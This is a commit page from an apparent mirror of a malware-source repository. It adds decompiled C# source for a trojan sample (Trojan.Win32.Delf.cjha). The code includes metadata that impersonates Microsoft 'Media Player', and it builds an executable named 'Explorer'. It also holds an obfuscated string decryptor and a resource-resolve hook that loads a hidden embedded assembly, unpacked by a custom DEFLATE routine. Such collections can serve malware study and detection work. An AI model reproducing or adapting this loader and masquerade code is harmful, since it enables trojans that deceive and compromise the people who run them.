daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/AssemblyInfo.cs
+12
View File
@@ -0,0 +1,12 @@
using SmartAssembly.Attributes;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTitle("Media Player")]
[assembly: AssemblyCopyright("Copyright © Microsoft 2010")]
[assembly: PoweredBy("Powered by {smartassembly}")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyProduct("Media Player")]
[assembly: Guid("47dbf2b9-d51b-4b30-ad47-d3a2cd5e8f11")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/SmartAssembly/Attributes/PoweredByAttribute.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.PoweredByAttribute
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using System;
namespace SmartAssembly.Attributes
{
public sealed class PoweredByAttribute : Attribute
{
public PoweredByAttribute(string s)
{
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/Trojan.Win32.Delf.cjha.csproj
+58
View File
@@ -0,0 +1,58 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{8A25B7D5-4EB6-4736-8F47-C115A1490D57}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Explorer</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="_0005\_0001.cs" />
<Compile Include="_0005\_0002.cs" />
<Compile Include="_0001\_0001.cs" />
<Compile Include="_0001\_0002.cs" />
<Compile Include="_0001\_0003.cs" />
<Compile Include="_0003\_0001.cs" />
<Compile Include="_0003\_0002.cs" />
<Compile Include="_0003\_0003.cs" />
<Compile Include="_0002\_0001.cs" />
<Compile Include="_0002\_0002.cs" />
<Compile Include="_0002\_0003.cs" />
<Compile Include="SmartAssembly\Attributes\PoweredByAttribute.cs" />
<Compile Include="_0004\_0001.cs" />
<Compile Include="_0004\_0002.cs" />
<Compile Include="_0004\_0003.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="{56732c33-a8ea-48e2-a548-0239f4aa8a0c}" />
<EmbeddedResource Include="{9ebaca4b-5cc4-4e1d-bb8b-a34a1921d651}" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/Trojan.Win32.Delf.cjha.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Explorer", "Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.csproj", "{8A25B7D5-4EB6-4736-8F47-C115A1490D57}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8A25B7D5-4EB6-4736-8F47-C115A1490D57}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8A25B7D5-4EB6-4736-8F47-C115A1490D57}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8A25B7D5-4EB6-4736-8F47-C115A1490D57}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8A25B7D5-4EB6-4736-8F47-C115A1490D57}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0001/_0001.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0001
{
internal sealed class \u0001
{
private static Stream \u0001;
private static int \u0001 = 0;
public static string \u0003([In] int obj0)
{
byte[] numArray;
lock (typeof (\u0001.\u0001))
{
if (\u0001.\u0001.\u0001 == null)
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
\u0001.\u0001.\u0001 = executingAssembly.GetManifestResourceStream(executingAssembly.ManifestModule.ModuleVersionId.ToString("B"));
byte[] publicKeyToken = executingAssembly.GetName().GetPublicKeyToken();
if (publicKeyToken != null)
{
for (int index = 0; index < publicKeyToken.Length - 1; index += 2)
\u0001.\u0001.\u0001 ^= ((int) publicKeyToken[index] << 8) + (int) publicKeyToken[index + 1];
}
int num = ((MethodBase.GetCurrentMethod().MetadataToken & 16777215) - 1) % (int) ushort.MaxValue;
\u0001.\u0001.\u0001 ^= num;
}
\u0001.\u0001.\u0001.Position = (long) (obj0 - \u0001.\u0001.\u0001);
int num1 = \u0001.\u0001.\u0001.ReadByte();
int count = (num1 & 128) != 0 ? ((num1 & 64) != 0 ? ((num1 & 31) << 24) + (\u0001.\u0001.\u0001.ReadByte() << 16) + (\u0001.\u0001.\u0001.ReadByte() << 8) + \u0001.\u0001.\u0001.ReadByte() : ((num1 & 63) << 8) + \u0001.\u0001.\u0001.ReadByte()) : num1;
numArray = new byte[count];
\u0001.\u0001.\u0001.Read(numArray, 0, count);
}
if (numArray.Length == 0)
return string.Empty;
byte[] bytes = Convert.FromBase64String(Encoding.UTF8.GetString(numArray, 0, numArray.Length));
return string.Intern(Encoding.UTF8.GetString(bytes, 0, bytes.Length));
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0001/_0002.cs
+16
View File
@@ -0,0 +1,16 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0001;
using System;
namespace \u0001
{
internal class \u0002
{
public static void \u0003() => AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u0003.\u0003);
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0001/_0003.cs
+25
View File
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0001;
using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace \u0001
{
internal class \u0003
{
private static Assembly \u0001;
internal static Assembly \u0003([In] object obj0, [In] ResolveEventArgs obj1)
{
if ((object) \u0003.\u0001 == null)
\u0003.\u0001 = Assembly.Load(\u0001.\u0001.\u0003(42851));
return \u0003.\u0001;
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0002/_0001.cs
+922
View File
@@ -0,0 +1,922 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using System;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace \u0002
{
internal class \u0001
{
public static byte[] \u0003([In] byte[] obj0)
{
\u0002.\u0001.\u0006 obj1 = new \u0002.\u0001.\u0006(obj0);
byte[] numArray1 = new byte[0];
int num1 = obj1.\u0004();
byte[] numArray2;
switch (num1)
{
case 25000571:
int length1 = obj1.\u0004();
numArray2 = new byte[length1];
int num2;
for (int index = 0; index < length1; index += num2)
{
int length2 = obj1.\u0004();
num2 = obj1.\u0004();
byte[] buffer = new byte[length2];
obj1.Read(buffer, 0, buffer.Length);
new \u0002.\u0001.\u0001(buffer).\u0003(numArray2, index, num2);
}
break;
case 67324752:
short num3 = (short) obj1.\u0003();
int num4 = obj1.\u0003();
int num5 = obj1.\u0003();
if (num1 != 67324752 || num3 != (short) 20 || num4 != 0 || num5 != 8)
throw new FormatException(\u0001.\u0001.\u0003(42948));
obj1.\u0004();
obj1.\u0004();
obj1.\u0004();
int length3 = obj1.\u0004();
int count1 = obj1.\u0003();
int count2 = obj1.\u0003();
if (count1 > 0)
{
byte[] buffer = new byte[count1];
obj1.Read(buffer, 0, count1);
}
if (count2 > 0)
{
byte[] buffer = new byte[count2];
obj1.Read(buffer, 0, count2);
}
byte[] buffer1 = new byte[obj1.Length - obj1.Position];
obj1.Read(buffer1, 0, buffer1.Length);
\u0002.\u0001.\u0001 obj2 = new \u0002.\u0001.\u0001(buffer1);
numArray2 = new byte[length3];
obj2.\u0003(numArray2, 0, numArray2.Length);
break;
default:
throw new FormatException(\u0001.\u0001.\u0003(42981));
}
obj1.Close();
return numArray2;
}
internal class \u0001
{
private static int[] \u0001 = new int[29]
{
3,
4,
5,
6,
7,
8,
9,
10,
11,
13,
15,
17,
19,
23,
27,
31,
35,
43,
51,
59,
67,
83,
99,
115,
131,
163,
195,
227,
258
};
private static int[] \u0002 = new int[29]
{
0,
0,
0,
0,
0,
0,
0,
0,
1,
1,
1,
1,
2,
2,
2,
2,
3,
3,
3,
3,
4,
4,
4,
4,
5,
5,
5,
5,
0
};
private static int[] \u0003 = new int[30]
{
1,
2,
3,
4,
5,
7,
9,
13,
17,
25,
33,
49,
65,
97,
129,
193,
257,
385,
513,
769,
1025,
1537,
2049,
3073,
4097,
6145,
8193,
12289,
16385,
24577
};
private static int[] \u0004 = new int[30]
{
0,
0,
0,
0,
1,
1,
2,
2,
3,
3,
4,
4,
5,
5,
6,
6,
7,
7,
8,
8,
9,
9,
10,
10,
11,
11,
12,
12,
13,
13
};
private int \u0001;
private int \u0002;
private int \u0003;
private int \u0004;
private int \u0005;
private bool \u0001;
private \u0002.\u0001.\u0002 \u0001;
private \u0002.\u0001.\u0003 \u0001;
private \u0002.\u0001.\u0005 \u0001;
private \u0002.\u0001.\u0004 \u0001;
private \u0002.\u0001.\u0004 \u0002;
public \u0001([In] byte[] obj0)
{
this.\u0001 = new \u0002.\u0001.\u0002();
this.\u0001 = new \u0002.\u0001.\u0003();
this.\u0001 = 2;
this.\u0001.\u0003(obj0, 0, obj0.Length);
}
private bool \u0003()
{
int num1 = this.\u0001.\u0003();
while (num1 >= 258)
{
switch (this.\u0001)
{
case 7:
int num2;
while (((num2 = this.\u0001.\u0003(this.\u0001)) & -256) == 0)
{
this.\u0001.\u0003(num2);
if (--num1 < 258)
return true;
}
if (num2 < 257)
{
if (num2 < 0)
return false;
this.\u0002 = (\u0002.\u0001.\u0004) null;
this.\u0001 = (\u0002.\u0001.\u0004) null;
this.\u0001 = 2;
return true;
}
this.\u0003 = \u0002.\u0001.\u0001.\u0001[num2 - 257];
this.\u0002 = \u0002.\u0001.\u0001.\u0002[num2 - 257];
goto case 8;
case 8:
if (this.\u0002 > 0)
{
this.\u0001 = 8;
int num3 = this.\u0001.\u0003(this.\u0002);
if (num3 < 0)
return false;
this.\u0001.\u0003(this.\u0002);
this.\u0003 += num3;
}
this.\u0001 = 9;
goto case 9;
case 9:
int index = this.\u0002.\u0003(this.\u0001);
if (index < 0)
return false;
this.\u0004 = \u0002.\u0001.\u0001.\u0003[index];
this.\u0002 = \u0002.\u0001.\u0001.\u0004[index];
goto case 10;
case 10:
if (this.\u0002 > 0)
{
this.\u0001 = 10;
int num4 = this.\u0001.\u0003(this.\u0002);
if (num4 < 0)
return false;
this.\u0001.\u0003(this.\u0002);
this.\u0004 += num4;
}
this.\u0001.\u0003(this.\u0003, this.\u0004);
num1 -= this.\u0003;
this.\u0001 = 7;
continue;
default:
continue;
}
}
return true;
}
private bool \u0004()
{
switch (this.\u0001)
{
case 2:
if (this.\u0001)
{
this.\u0001 = 12;
return false;
}
int num = this.\u0001.\u0003(3);
if (num < 0)
return false;
this.\u0001.\u0003(3);
if ((num & 1) != 0)
this.\u0001 = true;
switch (num >> 1)
{
case 0:
this.\u0001.\u0003();
this.\u0001 = 3;
break;
case 1:
this.\u0001 = \u0002.\u0001.\u0004.\u0001;
this.\u0002 = \u0002.\u0001.\u0004.\u0002;
this.\u0001 = 7;
break;
case 2:
this.\u0001 = new \u0002.\u0001.\u0005();
this.\u0001 = 6;
break;
}
return true;
case 3:
if ((this.\u0005 = this.\u0001.\u0003(16)) < 0)
return false;
this.\u0001.\u0003(16);
this.\u0001 = 4;
goto case 4;
case 4:
if (this.\u0001.\u0003(16) < 0)
return false;
this.\u0001.\u0003(16);
this.\u0001 = 5;
goto case 5;
case 5:
this.\u0005 -= this.\u0001.\u0003(this.\u0001, this.\u0005);
if (this.\u0005 != 0)
return !this.\u0001.\u0003();
this.\u0001 = 2;
return true;
case 6:
if (!this.\u0001.\u0003(this.\u0001))
return false;
this.\u0001 = this.\u0001.\u0003();
this.\u0002 = this.\u0001.\u0004();
this.\u0001 = 7;
goto case 7;
case 7:
case 8:
case 9:
case 10:
return this.\u0003();
case 12:
return false;
default:
return false;
}
}
public int \u0003([In] byte[] obj0, [In] int obj1, [In] int obj2)
{
int num1 = 0;
do
{
if (this.\u0001 != 11)
goto label_5;
label_2:
continue;
label_5:
int num2 = this.\u0001.\u0003(obj0, obj1, obj2);
obj1 += num2;
num1 += num2;
obj2 -= num2;
if (obj2 != 0)
goto label_2;
else
goto label_1;
}
while (this.\u0004() || this.\u0001.\u0004() > 0 && this.\u0001 != 11);
goto label_3;
label_1:
return num1;
label_3:
return num1;
}
}
internal class \u0002
{
private byte[] \u0001;
private int \u0001;
private int \u0002;
private uint \u0001;
private int \u0003;
public int \u0003([In] int obj0)
{
if (this.\u0003 < obj0)
goto label_4;
label_3:
return (int) ((long) this.\u0001 & (long) ((1 << obj0) - 1));
label_4:
if (this.\u0001 == this.\u0002)
return -1;
this.\u0001 |= (uint) (((int) this.\u0001[this.\u0001++] & (int) byte.MaxValue | ((int) this.\u0001[this.\u0001++] & (int) byte.MaxValue) << 8) << this.\u0003);
this.\u0003 += 16;
goto label_3;
}
public void \u0003([In] int obj0)
{
this.\u0001 >>= obj0;
this.\u0003 -= obj0;
}
[SpecialName]
public int \u0003() => this.\u0003;
[SpecialName]
public int \u0004() => this.\u0002 - this.\u0001 + (this.\u0003 >> 3);
public void \u0003()
{
this.\u0001 >>= this.\u0003 & 7;
this.\u0003 &= -8;
}
[SpecialName]
public bool \u0003() => this.\u0001 == this.\u0002;
public int \u0003([In] byte[] obj0, [In] int obj1, [In] int obj2)
{
int num1 = 0;
while (this.\u0003 > 0 && obj2 > 0)
{
obj0[obj1++] = (byte) this.\u0001;
this.\u0001 >>= 8;
this.\u0003 -= 8;
--obj2;
++num1;
}
if (obj2 == 0)
return num1;
int num2 = this.\u0002 - this.\u0001;
if (obj2 > num2)
obj2 = num2;
Array.Copy((Array) this.\u0001, this.\u0001, (Array) obj0, obj1, obj2);
this.\u0001 += obj2;
if ((this.\u0001 - this.\u0002 & 1) != 0)
{
this.\u0001 = (uint) this.\u0001[this.\u0001++] & (uint) byte.MaxValue;
this.\u0003 = 8;
}
return num1 + obj2;
}
public void \u0003([In] byte[] obj0, [In] int obj1, [In] int obj2)
{
if (this.\u0001 < this.\u0002)
throw new InvalidOperationException();
int num = obj1 + obj2;
if (0 > obj1 || obj1 > num || num > obj0.Length)
throw new ArgumentOutOfRangeException();
if ((obj2 & 1) != 0)
{
this.\u0001 |= (uint) (((int) obj0[obj1++] & (int) byte.MaxValue) << this.\u0003);
this.\u0003 += 8;
}
this.\u0001 = obj0;
this.\u0001 = obj1;
this.\u0002 = num;
}
}
internal class \u0003
{
private static int \u0001 = 32768;
private static int \u0002 = \u0002.\u0001.\u0003.\u0001 - 1;
private byte[] \u0001 = new byte[\u0002.\u0001.\u0003.\u0001];
private int \u0003;
private int \u0004;
public void \u0003([In] int obj0)
{
\u0002.\u0001.\u0003 obj = this;
int num1;
int num2 = num1 = obj.\u0004;
obj.\u0004 = num1 + 1;
if (num2 == \u0002.\u0001.\u0003.\u0001)
throw new InvalidOperationException();
this.\u0001[this.\u0003++] = (byte) obj0;
this.\u0003 &= \u0002.\u0001.\u0003.\u0002;
}
private void \u0003([In] int obj0, [In] int obj1, [In] int obj2)
{
while (obj1-- > 0)
{
byte[] numArray = this.\u0001;
\u0002.\u0001.\u0003 obj = this;
int num1;
int num2 = num1 = obj.\u0003;
obj.\u0003 = num1 + 1;
int index = num2;
int num3 = (int) this.\u0001[obj0++];
numArray[index] = (byte) num3;
this.\u0003 &= \u0002.\u0001.\u0003.\u0002;
obj0 &= \u0002.\u0001.\u0003.\u0002;
}
}
public void \u0003([In] int obj0, [In] int obj1)
{
if ((this.\u0004 += obj0) > \u0002.\u0001.\u0003.\u0001)
throw new InvalidOperationException();
int sourceIndex = this.\u0003 - obj1 & \u0002.\u0001.\u0003.\u0002;
int num = \u0002.\u0001.\u0003.\u0001 - obj0;
if (sourceIndex <= num && this.\u0003 < num)
{
if (obj0 <= obj1)
{
Array.Copy((Array) this.\u0001, sourceIndex, (Array) this.\u0001, this.\u0003, obj0);
this.\u0003 += obj0;
}
else
{
while (obj0-- > 0)
this.\u0001[this.\u0003++] = this.\u0001[sourceIndex++];
}
}
else
this.\u0003(sourceIndex, obj0, obj1);
}
public int \u0003([In] \u0002.\u0001.\u0002 obj0, [In] int obj1)
{
obj1 = Math.Min(Math.Min(obj1, \u0002.\u0001.\u0003.\u0001 - this.\u0004), obj0.\u0004());
int num1 = \u0002.\u0001.\u0003.\u0001 - this.\u0003;
int num2;
if (obj1 > num1)
{
num2 = obj0.\u0003(this.\u0001, this.\u0003, num1);
if (num2 == num1)
num2 += obj0.\u0003(this.\u0001, 0, obj1 - num1);
}
else
num2 = obj0.\u0003(this.\u0001, this.\u0003, obj1);
this.\u0003 = this.\u0003 + num2 & \u0002.\u0001.\u0003.\u0002;
this.\u0004 += num2;
return num2;
}
public int \u0003() => \u0002.\u0001.\u0003.\u0001 - this.\u0004;
public int \u0004() => this.\u0004;
public int \u0003([In] byte[] obj0, [In] int obj1, [In] int obj2)
{
int num1 = this.\u0003;
if (obj2 > this.\u0004)
obj2 = this.\u0004;
else
num1 = this.\u0003 - this.\u0004 + obj2 & \u0002.\u0001.\u0003.\u0002;
int num2 = obj2;
int length = obj2 - num1;
if (length > 0)
{
Array.Copy((Array) this.\u0001, \u0002.\u0001.\u0003.\u0001 - length, (Array) obj0, obj1, length);
obj1 += length;
obj2 = num1;
}
Array.Copy((Array) this.\u0001, num1 - obj2, (Array) obj0, obj1, obj2);
this.\u0004 -= num2;
if (this.\u0004 < 0)
throw new InvalidOperationException();
return num2;
}
}
internal class \u0004
{
private static byte[] \u0001 = new byte[16]
{
(byte) 0,
(byte) 8,
(byte) 4,
(byte) 12,
(byte) 2,
(byte) 10,
(byte) 6,
(byte) 14,
(byte) 1,
(byte) 9,
(byte) 5,
(byte) 13,
(byte) 3,
(byte) 11,
(byte) 7,
(byte) 15
};
private static int \u0001 = 15;
private short[] \u0001;
public static \u0002.\u0001.\u0004 \u0001;
public static \u0002.\u0001.\u0004 \u0002;
static \u0004()
{
byte[] numArray1 = new byte[288];
int num1 = 0;
while (num1 < 144)
numArray1[num1++] = (byte) 8;
while (num1 < 256)
numArray1[num1++] = (byte) 9;
while (num1 < 280)
numArray1[num1++] = (byte) 7;
while (num1 < 288)
numArray1[num1++] = (byte) 8;
\u0002.\u0001.\u0004.\u0001 = new \u0002.\u0001.\u0004(numArray1);
byte[] numArray2 = new byte[32];
int num2 = 0;
while (num2 < 32)
numArray2[num2++] = (byte) 5;
\u0002.\u0001.\u0004.\u0002 = new \u0002.\u0001.\u0004(numArray2);
}
public \u0004([In] byte[] obj0) => this.\u0003(obj0);
public static short \u0003([In] int obj0) => (short) ((int) \u0002.\u0001.\u0004.\u0001[obj0 & 15] << 12 | (int) \u0002.\u0001.\u0004.\u0001[obj0 >> 4 & 15] << 8 | (int) \u0002.\u0001.\u0004.\u0001[obj0 >> 8 & 15] << 4 | (int) \u0002.\u0001.\u0004.\u0001[obj0 >> 12]);
private void \u0003([In] byte[] obj0)
{
int[] numArray1 = new int[\u0002.\u0001.\u0004.\u0001 + 1];
int[] numArray2 = new int[\u0002.\u0001.\u0004.\u0001 + 1];
for (int index1 = 0; index1 < obj0.Length; ++index1)
{
int index2 = (int) obj0[index1];
if (index2 > 0)
++numArray1[index2];
}
int num1 = 0;
int length = 512;
for (int index = 1; index <= \u0002.\u0001.\u0004.\u0001; ++index)
{
numArray2[index] = num1;
num1 += numArray1[index] << 16 - index;
if (index >= 10)
{
int num2 = numArray2[index] & 130944;
int num3 = num1 & 130944;
length += num3 - num2 >> 16 - index;
}
}
this.\u0001 = new short[length];
int num4 = 512;
for (int index3 = \u0002.\u0001.\u0004.\u0001; index3 >= 10; --index3)
{
int num5 = num1 & 130944;
num1 -= numArray1[index3] << 16 - index3;
for (int index4 = num1 & 130944; index4 < num5; index4 += 128)
{
this.\u0001[(int) \u0002.\u0001.\u0004.\u0003(index4)] = (short) (-num4 << 4 | index3);
num4 += 1 << index3 - 9;
}
}
for (int index5 = 0; index5 < obj0.Length; ++index5)
{
int index6 = (int) obj0[index5];
if (index6 != 0)
{
int num6 = numArray2[index6];
int index7 = (int) \u0002.\u0001.\u0004.\u0003(num6);
if (index6 <= 9)
{
do
{
this.\u0001[index7] = (short) (index5 << 4 | index6);
index7 += 1 << index6;
}
while (index7 < 512);
}
else
{
int num7 = (int) this.\u0001[index7 & 511];
int num8 = 1 << (num7 & 15);
int num9 = -(num7 >> 4);
do
{
this.\u0001[num9 | index7 >> 9] = (short) (index5 << 4 | index6);
index7 += 1 << index6;
}
while (index7 < num8);
}
numArray2[index6] = num6 + (1 << 16 - index6);
}
}
}
public int \u0003([In] \u0002.\u0001.\u0002 obj0)
{
int index;
if ((index = obj0.\u0003(9)) >= 0)
{
int num1;
if ((num1 = (int) this.\u0001[index]) >= 0)
{
obj0.\u0003(num1 & 15);
return num1 >> 4;
}
int num2 = -(num1 >> 4);
int num3 = num1 & 15;
int num4;
if ((num4 = obj0.\u0003(num3)) >= 0)
{
int num5 = (int) this.\u0001[num2 | num4 >> 9];
obj0.\u0003(num5 & 15);
return num5 >> 4;
}
int num6 = obj0.\u0003();
int num7 = obj0.\u0003(num6);
int num8 = (int) this.\u0001[num2 | num7 >> 9];
if ((num8 & 15) > num6)
return -1;
obj0.\u0003(num8 & 15);
return num8 >> 4;
}
int num9 = obj0.\u0003();
int num10 = (int) this.\u0001[obj0.\u0003(num9)];
if (num10 < 0 || (num10 & 15) > num9)
return -1;
obj0.\u0003(num10 & 15);
return num10 >> 4;
}
}
internal class \u0005
{
private static readonly int[] \u0001 = new int[3]
{
3,
3,
11
};
private static readonly int[] \u0002 = new int[3]
{
2,
3,
7
};
private byte[] \u0001;
private byte[] \u0002;
private \u0002.\u0001.\u0004 \u0001;
private int \u0001;
private int \u0002;
private int \u0003;
private int \u0004;
private int \u0005;
private int \u0006;
private byte \u0001;
private int \u0007;
private static readonly int[] \u0003 = new int[19]
{
16,
17,
18,
0,
8,
7,
9,
6,
10,
5,
11,
4,
12,
3,
13,
2,
14,
1,
15
};
public bool \u0003([In] \u0002.\u0001.\u0002 obj0)
{
while (true)
{
switch (this.\u0001)
{
case 0:
this.\u0002 = obj0.\u0003(5);
if (this.\u0002 >= 0)
{
this.\u0002 += 257;
obj0.\u0003(5);
this.\u0001 = 1;
goto case 1;
}
else
goto label_2;
case 1:
this.\u0003 = obj0.\u0003(5);
if (this.\u0003 >= 0)
{
++this.\u0003;
obj0.\u0003(5);
this.\u0005 = this.\u0002 + this.\u0003;
this.\u0002 = new byte[this.\u0005];
this.\u0001 = 2;
goto case 2;
}
else
goto label_5;
case 2:
this.\u0004 = obj0.\u0003(4);
if (this.\u0004 >= 0)
{
this.\u0004 += 4;
obj0.\u0003(4);
this.\u0001 = new byte[19];
this.\u0007 = 0;
this.\u0001 = 3;
goto case 3;
}
else
goto label_8;
case 3:
for (; this.\u0007 < this.\u0004; ++this.\u0007)
{
int num = obj0.\u0003(3);
if (num < 0)
return false;
obj0.\u0003(3);
this.\u0001[\u0002.\u0001.\u0005.\u0003[this.\u0007]] = (byte) num;
}
this.\u0001 = new \u0002.\u0001.\u0004(this.\u0001);
this.\u0001 = (byte[]) null;
this.\u0007 = 0;
this.\u0001 = 4;
goto case 4;
case 4:
int num1;
while (((num1 = this.\u0001.\u0003(obj0)) & -16) == 0)
{
this.\u0002[this.\u0007++] = this.\u0001 = (byte) num1;
if (this.\u0007 == this.\u0005)
return true;
}
if (num1 >= 0)
{
if (num1 >= 17)
this.\u0001 = (byte) 0;
this.\u0006 = num1 - 16;
this.\u0001 = 5;
goto case 5;
}
else
goto label_19;
case 5:
int num2 = \u0002.\u0001.\u0005.\u0002[this.\u0006];
int num3 = obj0.\u0003(num2);
if (num3 >= 0)
{
obj0.\u0003(num2);
int num4 = num3 + \u0002.\u0001.\u0005.\u0001[this.\u0006];
while (num4-- > 0)
this.\u0002[this.\u0007++] = this.\u0001;
if (this.\u0007 != this.\u0005)
{
this.\u0001 = 4;
continue;
}
goto label_29;
}
else
goto label_24;
default:
continue;
}
}
label_2:
return false;
label_5:
return false;
label_8:
return false;
label_19:
return false;
label_24:
return false;
label_29:
return true;
}
public \u0002.\u0001.\u0004 \u0003()
{
byte[] destinationArray = new byte[this.\u0002];
Array.Copy((Array) this.\u0002, 0, (Array) destinationArray, 0, this.\u0002);
return new \u0002.\u0001.\u0004(destinationArray);
}
public \u0002.\u0001.\u0004 \u0004()
{
byte[] destinationArray = new byte[this.\u0003];
Array.Copy((Array) this.\u0002, this.\u0002, (Array) destinationArray, 0, this.\u0003);
return new \u0002.\u0001.\u0004(destinationArray);
}
}
internal class \u0006 : MemoryStream
{
public int \u0003() => this.ReadByte() | this.ReadByte() << 8;
public int \u0004() => this.\u0003() | this.\u0003() << 16;
public \u0006([In] byte[] obj0)
: base(obj0, false)
{
}
}
}
}
